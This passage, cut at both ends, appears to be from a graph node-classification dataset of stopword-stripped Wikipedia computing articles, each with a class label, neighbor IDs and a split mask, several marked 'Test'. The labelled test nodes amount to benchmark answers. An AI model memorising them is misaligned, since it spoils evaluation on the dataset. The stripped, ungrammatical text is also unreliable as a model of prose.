framebuffers capable 1280×1024 resolution 8-bit color zx leo zx 24-bit card hardware-accelerated 3d operations offering high speeds resolutions however poorly supported takes two sbus slots runs extremely hot faster cousin turbo zx requires fan card taking four sbus slots full support available solaris 2.4 2.6 though 2.6 drivers made work solaris 7 8 9 linux includes accelerated driver supports 2d acceleration features 3d netbsd openbsd support without acceleration nextstep openstep support whatsoever ss10 holds system information mac address serial number nvram battery chip dies system able boot",
    "neighbors": [
      9665,
      9955,
      10436,
      7307,
      4172,
      823,
      7411,
      1399,
      11129
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11427,
    "label": 2,
    "text": "Softvol:softvol softvol advanced linux sound architecture alsa plugin adds software based volume control alsa audio mixer alsamixer helpful sound card hardware volume control softvol plugin built alsa require separate installation another use case softvol hardware volume control unable amplify sound beyond certain threshold thus renders audio file quiet case software amplifiers created order boost volume level price sacrificing quality many modern software pieces able play audio files alsa sound system -independent softvol controls",
    "neighbors": [
      6293
    ],
    "mask": "Test"
  },
  {
    "node_id": 11428,
    "label": 3,
    "text": "Linux-HA:linux-ha linux-ha high-availability linux project provides high-availability clustering solution linux freebsd openbsd solaris mac os x promotes reliability availability serviceability ras project main software product heartbeat gpl-licensed portable cluster management program high-availability clustering important features project originated mailing list started november 1997 eventually harald milz wrote odd sort linux-ha howto unlike howtos configure use existing software collection ha techniques one could use one write ha software linux alan robertson inspired description thought could perhaps write software project act sort initial seed crystal help jump start project got initial software running 18 march 1998 created first web site project 19 october 1998 first version software released 15 november 1998 first production customer software rudy pawul iso-ne iso-ne web site went production second half 1999 point project limited two nodes simple takeover semantics resource monitoring cured version 2 software added n-node clusters resource monitoring dependencies policies version 2.0.0 came 29 july 2005 release represented another important milestone first version large contributions terms code size made linux-ha community large series releases brought project level feature parity-or-superiority respect commercial ha software version 2.1.4 cluster resource manager component responsible starting stopping resources monitoring resource node failure split separate project called pacemaker resource agents glue infrastructure moved separate packages thus version 3 series name heartbeat used cluster messaging layer",
    "neighbors": [
      865,
      7812,
      10917,
      8554,
      823,
      7983,
      6993,
      4852,
      4149,
      9621,
      3927,
      8539,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11429,
    "label": 4,
    "text": "Splunk:splunk splunk inc. american public multinational corporation based san francisco california produces software searching monitoring analyzing machine-generated big data via web-style interface splunk product captures indexes correlates real-time data searchable repository generate graphs reports alerts dashboards visualizations splunk mission make machine data accessible across organization identifying data patterns providing metrics diagnosing problems providing intelligence business operations splunk horizontal technology used application management security compliance well business web analytics early 2016 splunk 10,000 customers worldwide splunk based san francisco regional operations across europe middle east africa asia australia michael baum rob das erik swan co-founded splunk inc 2003 venture firms august capital seven rosen ignition partners jk b capital backed company 2007 splunk raised became profitable 2009 2012 splunk initial public offering trading nasdaq symbol splk september 2013 company acquired bugsense mobile-device data-analytics company bugsense provides mobile analytics platform used developers improve app performance improve quality supplied software developer kit give developers access data analytics mobile devices managed scalable cloud platform acquisition amount undisclosed july 2015 splunk acquired caspida cybersecurity startup october 2015 splunk sealed cybersecurity alliance u.s. government security contractor booz allen hamilton inc. offer combined cyberthreat detection intelligence-analysis technology 2016 splunk pledged donate 100 million software support nonprofits schools 10-year period according glassdoor fourth highest-paying company employees united states april 2017 october 2017 splunk acquired certain technology intellectual property assets smaller rival rocana april 9 2018 splunk acquired phantom cyber corporation approximately us 350 million june 11 2018 splunk announced acquisition victorops devops incident management startup us 120 million splunk core offering collects analyzes high volumes machine-generated data uses standard api connect directly applications devices developed response demand comprehensible actionable data reporting executives outside company department splunk enterprise security es security information event management siem solution provides insight machine data generated security technologies network endpoint access malware vulnerability identity information premium application licensed independently splunk core 2011 splunk released splunk storm cloud-based version core splunk product splunk storm offered turnkey managed hosted service machine data 2013 splunk announced splunk storm would become completely free service expanded cloud offering splunk cloud 2015 splunk shut splunk storm 2013 splunk announced product called hunk splunk analytics hadoop supports accessing searching reporting external data sets located hadoop splunk interface 2015 splunk announced light version core splunk product aimed smaller it-environments mid-sized enterprises splunk debuted splunk service intelligence itsi september 2015 itsi leverages splunk data provide visibility performance software analytics detect unusual behavior determine causes areas affects 2016 google announced cloud platform integrate splunk expand areas like ops security compliance company also announced additional machine learning capabilities several major product offerings installed top platform 2017 splunk introduced splunk insights ransomware analytics tool assessing investigating potential threats ingesting event logs multiple sources software targeted toward smaller organizations like universities company also launched splunk insights aws cloud monitoring service facilitate enterprises migration amazon web services cloud 2018 splunk introduced splunk industrial asset intelligence extracts information iiot industrial internet things data various resources presents users critical alerts splunkbase community hosted splunk users go find apps add-ons splunk improve functionality usefulness splunk well provide quick easy interface specific use-cases and/or vendor products integrations splunkbase include splunk app new relic forescout extended module splunk splunk app aws splunk architectures",
    "neighbors": [
      4033,
      11201,
      6372,
      4234,
      2765,
      2733,
      7725,
      6576,
      6993,
      1970,
      7248,
      10196,
      1111,
      1943,
      11542,
      2842,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 11430,
    "label": 2,
    "text": "IOS_6:ios 6 ios 6 sixth major release ios mobile operating system developed apple inc successor ios 5 announced company worldwide developers conference june 11 2012 released september 19 2012 succeeded ios 7 september 18 2013. ios 6 added new apple maps app replacing google maps default mapping service operating system dedicated podcasts app central location podcasts passbook app managing different types tickets boarding passes coupons loyalty cards app store received visual overhaul bringing card-based app layout well tweaks search algorithms facebook integrated operating system incorporating status messages like buttons contact event synchronization several apple apps new privacy controls allow users fine-grained app permissions well option prevent targeted advertising siri added devices updated functionality including ability make restaurant reservations launch apps retrieve movie reviews sports statistics read items notification center reception ios 6 positive critics noted operating system offer significant speed improvements major redesigned elements instead focused refinements general consensus apple n't overhauling things sake ios 6 n't completely change way use device tweaks ... make many daily smartphone actions easier across board critics noted refinement something already works extremely well something companies would well emulate release apple maps however attracted significant criticism due inaccurate incomplete data issues prompted open letter apology apple ceo tim cook played contributing role dismissal scott forstall company supervised ios development since inception ios 6 seen updates since march 2014 two subversions ios 6 still 'signed apple software update 6.1.3 certain models ipad 2 iphone 4s 6.1.6 iphone 3gs ipod touch 4th generation meaning verified installed mentioned devices provided user necessary ipsw file ios 6 introduced apple worldwide developers conference june 11 2012. ios 6 officially released september 19 2012. ios 6.0.1 released november 1 2012 first update ios 6 included bug fixes ios 6.0.2 released exclusively iphone 5 ipad mini december 18 2012 fix wi-fi issues ios 6.1 released january 28 2013 update included lte compatibility carriers around world siri fandango integration allow users purchase movie tickets voice u.s. reset advertising identifier setting settings allowing users greater control apps track usage ios 6.1.1 released february 11 2013 specifically iphone 4s fixes issues could impact cellular performance stability ios 6.1.2 released february 19 2013 fix exchange calendar bug could impact network activity battery life ios 6.1.3 released march 19 2013 bug fixes including patching potential lock screen bypass method various improvements ios 6.1.4 released may 2 2013 specifically iphone 5 updated audio profile speakerphone ios 6.1.5 released november 14 2013 specifically 4th generation ipod touch fix facetime calls failing ios 6.1.6 released february 21 2014 specifically 4th generation ipod touch iphone 3gs fixes ssl connection verification also last version ios supported devices apple siri intelligent personal assistant introduced ios 5 release iphone 4s updated include ability make restaurant reservations launch apps read items notification center dictate facebook twitter updates retrieve movie reviews detailed sports statistics siri received language support italian korean cantonese device support iphone 5 fifth-generation ipod touch third-generation ipad ios 6.1 siri integrated fandango allowing users buy film tickets voice feature available united states launch facebook came integrated several apple native apps ios 6 facebook features could directly accessed within native apps calendar could synchronize facebook events contacts could show facebook friend information app store game center featured facebook like button well widget notification center allowed users post status updates social network settings app received multiple changes ios 6 icon revised match system preferences icon used then-named os x computer operating system developed apple disturb mode added allows users disable phone sounds additional options disturb mode include able allow phone calls specific group contacts allowing sound second call someone calls repeatedly crescent moon icon appear status bar disturb mode enabled new privacy settings became available users addition location services following menus added ios 6 contacts calendars reminders photos updated privacy menus allow users fine-grained privacy permission controls app new notifications apps want access information categories ios 6 also came limit ad tracking user control setting allow users option prevent targeted advertising apple advertising identifier described apple nonpermanent nonpersonal device identifier advertising networks use give control advertisers ability use tracking methods choose limit ad tracking advertising networks using advertising identifier may longer gather information serve targeted ads ios 6.1 reset advertising identifier setting added allow users reset identifier used advertising companies ios 6 added twitter widget notification center users could tweet without going app saved resources share sheet interface updated display grid icons opposed list different apps users could share content new apple maps app replaced google maps default mapping app operating system apple maps used apple vector-based engine making smoother zooming new maps turn-by-turn navigation spoken directions 3d views certain countries flyover views major cities real-time traffic launch turn-by-turn navigation available iphone 4s later ipad 2 cellular capability required later flyover view available iphone 4s later fifth-generation ipod touch ipad 2 later new passbook app added retrieve documents boarding passes admission tickets coupons loyalty cards ios device passbook replace physical card scanned process mobile payment participating locations app context-aware features notifications relevant coupons immediate vicinity given store automatic visibility boarding passes user airport notifications gate changes camera app updated include new panorama mode allowed users take 240-degree panoramic photos photos app received updates photo stream functionality letting users remove images well share custom photo streams people public app store ios 6 brand new user interface removed categories tab replaced genius apple search recommendation engine also made use cards rather lists present apps also tweaks app store search algorithm resulting trend favor newer companies sparked developer concerns praise app store also updated apps without requiring itunes password installing updating app users longer automatically returned home screen upon receiving calls ios 6 enabled users swipe lock screen reveal reply message remind later reply message feature shows several pre-determined messages option custom message remind later feature offers several options hour later user gets home user leaves current location enable reminder podcast functionality separated itunes app received podcasts app ios 6 order centralize promote podcast listening downloading users safari web browser updated full-screen landscape view iphone ipod touch users reading list feature introduced ios 5 received offline support text images layout saved articles get stored user device facetime video calling updated work cellular connection addition wi-fi clock app iphone ipod touch since original release became available ipad clock design looked similar swiss railway clock apple formed agreement swiss federal railways license design use youtube app default app ios developed apple removed apple told verge reason removal due expired license youtube users could still view videos safari web browser company also confirmed google owns youtube developing app then-upcoming release app store apple-developed youtube app remained ios 5 previous ios versions june 2017 former youtube employee hunter walk tweeted apple contacted youtube make default app original iphone ensure mass market mobile launch video-sharing service required handling development efforts 2012 youtube made gutsy move discontinue license effort take back control app developing reception ios 6 positive dan seifert verge wrote ios 6 looks nearly identical ios 5 subtle tweaks ... every small change look ios details ten things remain praising iphone 4s snappy performer noted comes speed ios 6 n't feel terribly different ios 5 craig grannell techradar wrote ios 6 rather like iphone 5 os x mountain lion refinement something already works extremely well apple n't overhauling things sake main making ios experience gradually better something companies would well emulate jason parker cnet wrote ios 6 welcome upgrade ios user going completely change way use device instead tweaks make many daily smartphone actions easier across board offer relief waiting certain features sending images e-mail call controls example ios 6 apple replaced google maps apple maps default mapping service operating system immediately faced criticism inaccurate incomplete data including museum river missing towns satellite images obscured clouds missing local places apple ceo tim cook issued letter apple website apologizing frustration caused maps application recommended downloading alternative map apps app store scott forstall then-vp ios software engineering involuntarily dismissed role apple october 2012 refused sign name letter apologizing shortcomings apple new mapping service september 2012 sarah downey privacy expert software company abine expressed concern spite new advertising identifier apple n't disclose details identifier actually based stated need tell identifying 've seen lot non-identifying pieces data identify quite easily 're using opt-out apple may longer gather information serve targeted ads says may still collect information things serve targeted ads like build databases send marketing sell third parties many users reported higher-than-normal data usage upgrading ios 6 causing heavily billed data largely exceeding data plan steve rosenbaum huffington post wrote bug result ios 6 problem connects phone cellular data network whenever phone connected wifi signal also stated apple released patch april 2014 users still running ios 6 could connect facetime due expiration certificate apple released support document explaining problem adding devices capable upgrading ios 7 must fix issue devices stuck ios 6 would receive ios 6.1.6 update release apple dropped support older devices specifically third-generation ipod touch first-generation ipad",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      10888,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      3241,
      171,
      2735,
      3248,
      2228,
      4283,
      3772,
      7869,
      9408,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      11589,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      11137,
      2439,
      6023,
      9610,
      6539,
      7052,
      400,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 11431,
    "label": 2,
    "text": "CE_Linux_Forum:ce linux forum ce linux forum otherwise known consumer electronics linux forum celf non-profit organization works advance linux open source platform consumer electronics ce devices primarily technical focus working specifications implementations conferences testing help linux developers improve linux use ce products celf several key initiatives including forum outgrowth joint project sony corporation matsushita electric industrial co. ltd. also known panasonic celf founded june 2003 several large consumer electronics companies including matsushita electric industrial co. ltd. sony corporation hitachi ltd. nec corporation royal philips electronics samsung electronics co. ltd. sharp corporation toshiba corporation 2009 celf 30 members consisting consumer electronics manufacturers semiconductor vendors linux software companies arm ltd. axe inc. broadcom canon inc. etri fujitsu limited fuji-xerox hewlett-packard hitachi ltd. ibm intel corporation justsystems corporation lg electronics lineo solutions inc panasonic corporation mips technologies nec corporation nxp semiconductors renesas royal philips electronics samsung electronics selenic consulting sharp corporation snapgear sony corporation toshiba corporation yamaha corporation 2007 celf following technical working groups working groups collect improvements linux linux-related software celf members help members coordinate projects enhance linux respective technical areas forum encourages members submit technical output directly back relevant open source project example sending enhancements linux kernel directly linux kernel mailing list appropriate technology- architecture-specific mailing list collected information forum output primarily located forum wiki embedded developers ce linux forum also sponsorships bring embedded projects fruition thanks grants celf amongst others linuxtiny patches logfs squashfs flash file systems pushed mainline linux celf hosts elinux.org wiki wiki dedicated embedded linux forum driving force behind embedded linux conference since 2005 originally started conference us spring also yearly elc europe autumn time frame conferences developer-focused usually attract 150-200 linux engineers elc english-language conference several parallel tracks lasts 2 3 days european conference always co-hosted 2007 hosted real-time linux workshop linz austria 2008 nluug ede netherlands 2009 embedded systems week grenoble 2009 2010 spring conferences americas co-organized linux foundation celf sponsored linux symposium 2004 2008 hosting bofs sessions specific embedded use linux development linux capabilities embedded use japan korea celf organizes technical jamborees every two months jamborees smaller single track held local language",
    "neighbors": [
      4708,
      4871,
      2730,
      4011,
      823,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11432,
    "label": 4,
    "text": "FIPS_140:fips 140 140 series federal information processing standards fips u.s. government computer security standards specify requirements cryptography modules current version standard fips 140-2 issued 25 may 2001 successor fips 140-3 approved march 22 2019 become effective september 22 2019 fips 140-3 testing begin september 22 2020 fips 140-3 testing begins fips 140-2 testing continue least year making two standards coexist time national institute standards technology nist issues 140 publication series coordinate requirements standards cryptographic modules include hardware software components use departments agencies united states federal government fips 140 purport provide sufficient conditions guarantee module conforming requirements secure still less system built using modules secure requirements cover cryptographic modules also documentation highest security level aspects comments contained source code user agencies desiring implement cryptographic modules confirm module using covered existing validation certificate fips 140-1 fips 140-2 validation certificates specify exact module name hardware software firmware and/or applet version numbers levels 2 higher operating platform upon validation applicable also listed vendors always maintain baseline validations cryptographic module validation program cmvp operated jointly united states government national institute standards technology nist computer security division communications security establishment cse government canada use validated cryptographic modules required united states government unclassified uses cryptography government canada also recommends use fips 140 validated cryptographic modules unclassified applications departments fips 140-2 defines four levels security simply named level 1 level 4 specify detail level security required particular application addition specified levels section 4.1.1 specification describes additional attacks may require mitigation differential power analysis product contains countermeasures attacks must documented tested protections required achieve given level thus criticism fips 140-2 standard gives false sense security levels 2 standard implies modules tamper-evident and/or tamper-resistant yet modules permitted side channel vulnerabilities allow simple extraction keys fips 140 imposes requirements eleven different areas fips 140-1 issued 11 january 1994 developed government industry working group composed vendors users cryptographic equipment group identified four security levels eleven requirement areas listed specified requirements area level fips 140-2 issued 25 may 2001 takes account changes available technology official standards since 1994 comments received vendor tester user communities main input document international standard iso/iec 19790:2006 security requirements cryptographic modules issued 1 march 2006 nist issued special publication 800-29 outlining significant changes fips 140-1 fips 140-2 fips 140-3 new version standard currently development first draft version fips 140-3 standard nist introduced new software security section one additional level assurance level 5 new simple power analysis spa differential power analysis dpa requirements draft issued 11 sep 2009 however reverted four security levels limits security levels software levels 1 2 due way validation process set software vendor required re-validate fips-140-validated module every change matter small software re-validation required even obvious bug security fixes since validation expensive process gives software vendors incentive postpone changes software result software receive security updates next validation result may validated software less safe non-validated equivalent",
    "neighbors": [
      9281,
      420,
      229,
      7527,
      8904,
      10121,
      2733,
      2477,
      7983,
      5136,
      9165,
      10801,
      3097,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11433,
    "label": 4,
    "text": "Andromeda_(trojan):andromeda trojan andromeda modular trojan first spotted 2011 behavior malware capability checking whether executed debugged virtual environment using anti-virtual machine techniques downloads malware control servers often order steal information infected computers affected countries india 24 vietnam 12 iran 7",
    "neighbors": [
      7515,
      10756
    ],
    "mask": "None"
  },
  {
    "node_id": 11434,
    "label": 4,
    "text": "PacketFence:packetfence packetfence open-source network access control nac system provides following features registration detection abnormal network activities proactive vulnerability scans isolation problematic devices remediation captive portal 802.1x wireless integration user-agent dhcp fingerprinting",
    "neighbors": [
      9146,
      9442,
      3462,
      8582,
      7983,
      5490,
      823,
      6586
    ],
    "mask": "Test"
  },
  {
    "node_id": 11435,
    "label": 4,
    "text": "Michael_Schearer:michael schearer michael schearer born november 28 1975 american lawyer writer computer security researcher known research presentations technology improvised explosive devices wireless security cryptography privacy related legal issues contributing author multiple books computer security currently lawyer dla piper computer hacker community known theprez98 originally reading pennsylvania schearer used live glen burnie maryland lives spring grove pennsylvania schearer law degree university maryland francis king carey school law master degree national security studies georgetown university bachelor arts degree political science bloomsburg university previously worked booz allen hamilton united states navy june 1999 february 2008 schearer served naval flight officer electronic countermeasures officer ecmo ea-6b prowler aircraft 2003 2004 schearer flew combat missions vaq-139 uss abraham lincoln afghanistan operation enduring freedom iraq operation southern watch iraq initial phase operation iraqi freedom may 2005 february 2008 schearer assistant professor naval science nrotc unit located pennsylvania state university time deployed iraq nine months electronic warfare officer tasked train military forces use counter-ied equipment returning iraq schearer gave several public presentations concerning technology improvised explosive devices schearer written several articles published naval safety center publications sea shore approach also maintains weblog mikeblog focuses interests sports politics computer technology projects reading also previously wrote popular plain english series summaries supreme court opinions appellate cases easy-to-read format schearer founding member reformed church wifi wireless security research group church hosts member-contributed projects related wireless security issues presented research def con h.o.p.e. penn state security day shmoocon schearer also founding member former keyholder central maryland hackerspace unallocated space schearer presented research number conferences including def con shmoocon penn state security day",
    "neighbors": [
      6040,
      9640,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11436,
    "label": 2,
    "text": "RUNT_Linux:runt linux runt linux acronym resnet usb network tester one many linux distros designed run usb flash drive runt based slackware bare kernel originally designed network tool students north carolina state university consists boot floppy image zip file similar zipslack intended fairly complete linux installation use testing tool capable booting x86 computer usb port bootable floppy",
    "neighbors": [
      11436,
      10149,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11437,
    "label": 4,
    "text": "Protected_computer:protected computer protected computers term used title 18 section 1030 united states code computer fraud abuse act prohibits number different kinds conduct generally involving unauthorized access damage data stored protected computers statute amended national information infrastructure protection act 1996 defines protected computers formerly known federal interest computers computer— exclusively use financial institution united states government case computer exclusively use used financial institution united states government conduct constituting offense affects use financial institution government b used interstate foreign commerce communication including computer located outside united states used manner affects interstate foreign commerce communication united states law prohibits unauthorized obtaining information protected computer conduct involved interstate foreign communication makes felony intentionally transmit malware protected computer 5000 damage integrity data result u. s. justice department explains 1994 amendments national information infrastructure act reach subsection e. subsection 1030 5 broadened replacing term federal interest computer term computer used interstate commerce communications latter term broader old definition federal interest computer 18 u.s.c § 1030 e 2 b covered computer one two computers used committing offense located state meant hacker attacked computers state subject federal jurisdiction even actions may severely affected interstate foreign commerce example individuals attack telephone switches may disrupt interstate foreign calls 1994 change remedied defect however definition federal interest computer actually covered simply interstate activity specifically 18 u.s.c § 1030 e 2 covered generically computers belonging united states government financial institutions used entities non-exclusive basis conduct constituting offense affected government operation financial institution operation computer changing § 1030 5 federal interest computer computer used interstate commerce communications congress may inadvertently eliminated federal protection government financial institution computers used interstate communications example integrity availability classified information contained intrastate local area network may protected 1994 version 18 u.s.c § 1030 5 although confidentiality continued protected 18 u.s.c § 1030 1 remedy situation 1996 act 18 u.s.c § 1030 5 redrafted cover protected computer new term defined § 1030 e 2 used throughout new statute -- § 1030 5 well §§ 1030 2 4 new 7 definition protected computer includes government computers financial institution computers computer used interstate foreign commerce communications broad definition addresses original concerns regarding intrastate phone phreakers i.e. hackers penetrate telecommunications computers also specifically includes computers used foreign communications continually expanding global information infrastructure numerous instances international hacking growing possibility increased global industrial espionage important united states jurisdiction international computer crime cases arguably old definition federal interest computer contained 18 u.s.c § 1030 e 2 conferred jurisdiction requirement computers used committing offense located state might satisfied one computer located overseas general rule however congress laws presumed domestic scope absent specific grant extraterritorial jurisdiction e.e.o.c v. arabian american oil co. 499 u.s. 244 1991 ensure clarity statute amended reference international communications explicitly",
    "neighbors": [
      4945,
      11659,
      7564,
      4133
    ],
    "mask": "None"
  },
  {
    "node_id": 11438,
    "label": 3,
    "text": "IBM_ThinkPad_Butterfly_keyboard:ibm thinkpad butterfly keyboard trackwrite also known butterfly keyboard foldout laptop computer keyboard designed john karidis ibm part thinkpad 701 series released 1995 allowed 701 series compact closed comfortable use open despite 24.6 cm 9.7 wide 26.4 cm 10.4 vga lcd 701 top selling laptop 1995 however later laptop models featured progressively larger screens need folding keyboard eliminated consequently model 701 used butterfly keyboard butterfly keyboard split two roughly triangular pieces slide laptop lid opened closed lid opened pieces slide sides followed one piece sliding downward two halves mesh form keyboard 29.2 cm 11.5 wide overhangs sides laptop body conversely lid closed one piece slides back slide inward keyboard covered lid movement keyboard driven cam lid hinge motions keyboard parts always synchronized movement lid unusual design displayed design collection museum modern art manhattan new york die neue sammlung",
    "neighbors": [
      3304,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 11439,
    "label": 8,
    "text": "Puma_(web_server):puma web server puma http web server derived mongrel written evan phoenix stresses speed efficient use memory puma web server shipped mastodon recommended heroku hosting provider replacement unicorn deliveroo published benchmark comparing two servers concluded “ puma performs better unicorn tests either heavily io-bound interleaved io cpu work ” unicorn still slightly better performing situations cpu load limiting factor",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      9245,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      8495,
      10800,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      9320,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 11440,
    "label": 3,
    "text": "SPARCstation_5:sparcstation 5 sparcstation 5 ss5 code-named aurora workstation introduced sun microsystems march 1994 based sun4m architecture enclosed pizza-box chassis simplified cheaper version ss5 released 1996 sparcstation 4 sun also marketed machines netra brand without framebuffers keyboards preconfigured requisite software used web servers sparcstation 5 may incorporate one following processors 70 85 110 mhz sun microsystems microsparc-ii 170 mhz fujitsu microelectronics inc. fmi turbosparc fujitsu also provided 160 mhz turbosparc cpu upgrade kit upgrading 70 85 110 mhz microsparc-ii models sparcstation 5 mbus thus limited use single-processor machine sparcstation 5 eight dsimm slots memory expansion slots filled individually either 8mb 32mb modules giving maximum 256mb memory memory used identical sparcstation 4 sparcstation 5 hold two internal 80-pin sca single ended fast-narrow scsi drives scsi cd-rom drive floppy also supports external scsi devices ide/atapi support sparcstation 5 comes on-board amd lance ethernet chipset providing 10baset networking standard 10base2 10base5 via aui transceiver 10/100mbit/s hme happy meal nic added faster connections openboot rom able boot network using rarp tftp like sparcstation systems ss5 holds system information mac address serial number nvram battery chip dies system able boot sparcstation 5 three sbus expansion slots typical sun computer equipment era third shared expansion backplate physical space special afx connector unique sparcstation 5 one card released slot known s24 tcx framebuffer allowed use 24-bit colour graphics instead eight bit colour sbus cg6 card also known lego low end graphics option tcx also used on-board framebuffer sparcstation 4 version less advanced supported eight bit colour sparcstation 4 introduced 1995 provide lower price point sparcstation 5 although offered 110 mhz microsparc-ii processor sparcstation 5 one sbus expansion slot instead three single 1.05 gb hard drive maximum memory capacity 160 mb instead 256 mb instead built-in audio sparcstation 5 sparcstation 4 requires optional module installed dedicated slot system includes built-in 8-bit pixel-accelerated graphics adapter new lower-cost 17 monitor introduced option afx graphics port sparcstation 4 standard aui ethernet connector unlike sparcstation 5 requires special cable mate non-standard connector sun used enclosure sparcstation 4 sparc xterminal 1 name implies marketed x terminal local storage unlike earlier sparcclassic x use motherboard workstation derived instead using lower-powered 50 mhz microsparc processor expansion base memory 8 mb 128 mb rather 160 mb rather running solaris sparc xterminal 1 sparcclassic x loaded ran special software network sun offered upgrade kit full workstation included swap sparcstation 4 motherboard hard drive additional memory following operating systems run sparcstation 5",
    "neighbors": [
      225,
      9665,
      9955,
      36,
      10436,
      10595,
      10982,
      7307,
      878,
      2895,
      7983,
      823,
      26,
      1788
    ],
    "mask": "None"
  },
  {
    "node_id": 11441,
    "label": 1,
    "text": "Lex_de_Haan:lex de haan lex de haan 11 august 1954 – 1 february 2006 independent author lecturer researcher consultant specializing relational database technology lex teacher mathematics/informatics secondary school level years 1976 1985 1985 1989 lex employed one year research department dutch independent system vendor minihouse/multihouse moved education department developed delivered courses following areas relational databases sql oracle system development database administration oracle versions 4/5/6 unix system users unix system administration vax/vms system users vax/vms system administration teaching skills workshops lex de haan also responsible hiring mentoring new instructors 1988 1990 lex developed courseware independent contractor de haan consultancy advised organizations education needs delivered classes important customers dutch ministry health culture dutch government education institute roi also worked regular basis frans remmen dutch rdbms sql guru time senior consultant courseware developer instructor pao courses well-known dutch post-academic education organization 1999 lex de haan joined dutch national body iso standardization committee sql language work sql:1999 sql:2003 standards 2002 lex involved oaktable network oracle experts beginning see http //www.oaktable.net march 2004 lex independent 14 years employment oracle lex taught seminars courses natural join b.v. data server internals oracle database 10g new features sql belgium france denmark slovakia sweden turkey united kingdom ireland saudi arabia bahrain another year lot teaching traveling like 2004 lex de haan also delivered well-received presentations hotsos symposium dallas texas ukoug conference birmingham lex de haan also started writing new book together toon koppelaars exciting tentative title applied mathematics database professionals appear mid-2006 last least started organizing seminar events february 2005 lex de haan invited tom kyte us come netherlands teach three-day seminar utrecht first event became great success october 2005 invited steve adams sydney australia second seminar successful seminar series born several events oracle gurus world scheduled 2006 lex de haan author following books oracleekspert magazine published article april 2004 lex de haan entitled 'lex sql server land oracle magazine published article july/august 2005 issue lex de haan jonathan gennick entitled 'nulls nothing worry november 2003 lex de haan held presentation 'the oracle database past present future conference university aalborg denmark",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11442,
    "label": 2,
    "text": "Unix_shell:unix shell unix shell command-line interpreter shell provides command line user interface unix-like operating systems shell interactive command language scripting language used operating system control execution system using shell scripts users typically interact unix shell using terminal emulator however direct operation via serial hardware connections secure shell common server systems unix shells provide filename wildcarding piping documents command substitution variables control structures condition-testing iteration generic sense term shell means program users employ type commands shell hides details underlying operating system manages technical details operating system kernel interface lowest-level inner-most component operating systems unix-like operating systems users typically many choices command-line interpreters interactive sessions user logs system interactively shell program automatically executed duration session type shell may customized user typically stored user profile example local passwd file distributed configuration system nis ldap however user may execute available shell interactively hosts windowing system like macos users may never use shell directly unix systems shell historically implementation language system startup scripts including program starts windowing system configures networking many essential functions however system vendors replaced traditional shell-based startup system init different approaches systemd first unix shell thompson shell sh written ken thompson bell labs distributed versions 1 6 unix 1971 1975 though rudimentary modern standards introduced many basic features common later unix shells including piping simple control structures using codice_1 codice_2 filename wildcarding though current use still available part ancient unix systems modeled multics shell developed 1965 american software engineer glenda schroeder schroeder multics shell modeled runcom program louis pouzin showed multics team rc suffix unix configuration files example .vimrc remnant runcom ancestry unix shells pwb shell mashey shell sh upward-compatible version thompson shell augmented john mashey others distributed programmer workbench unix circa 1975-1977 focused making shell programming practical especially large shared computing centers added shell variables precursors environment variables including search path mechanism evolved path user-executable shell scripts interrupt-handling control structures extended if/goto if/then/else/endif switch/breaksw/endsw while/end/break/continue shell programming became widespread external commands incorporated shell performance widely distributed influential early unix shells bourne shell c shell shells used coding base model many derivative work-alike shells extended feature sets bourne shell sh new unix shell stephen bourne bell labs distributed shell unix version 7 1979 introduced rest basic features considered common unix shells including documents command substitution generic variables extensive builtin control structures language including use reversed keyword mark end block influenced algol 68 traditionally bourne shell program name sh path unix file system hierarchy /bin/sh number compatible work-alikes also available various improvements additional features many systems sh may symbolic link hard link one alternatives posix standard specifies standard shell strict subset korn shell enhanced version bourne shell user perspective bourne shell immediately recognized active characteristic default command line prompt character dollar sign c shell csh modeled c programming language including control structures expression grammar written bill joy graduate student university california berkeley widely distributed bsd unix c shell also introduced many features interactive work including history editing mechanisms aliases directory stacks tilde notation cdpath job control path hashing many systems csh may symbolic link hard link tenex c shell tcsh improved version joy original version although interactive features csh copied shells language structure widely copied work-alike hamilton c shell written nicole hamilton first distributed os/2 1988 windows since 1992 shells read configuration files various circumstances files usually contain commands shell executed loaded usually used set important variables used find executables like path others control behavior appearance shell table section shows configuration files popular shells explanation variations unix shell concept n't derive bourne shell c shell include following",
    "neighbors": [
      9733,
      2062,
      9747,
      7188,
      9762,
      5156,
      2603,
      9780,
      10304,
      8771,
      8262,
      1611,
      2132,
      10841,
      10341,
      5743,
      8303,
      8304,
      5236,
      6772,
      9848,
      5754,
      5759,
      1666,
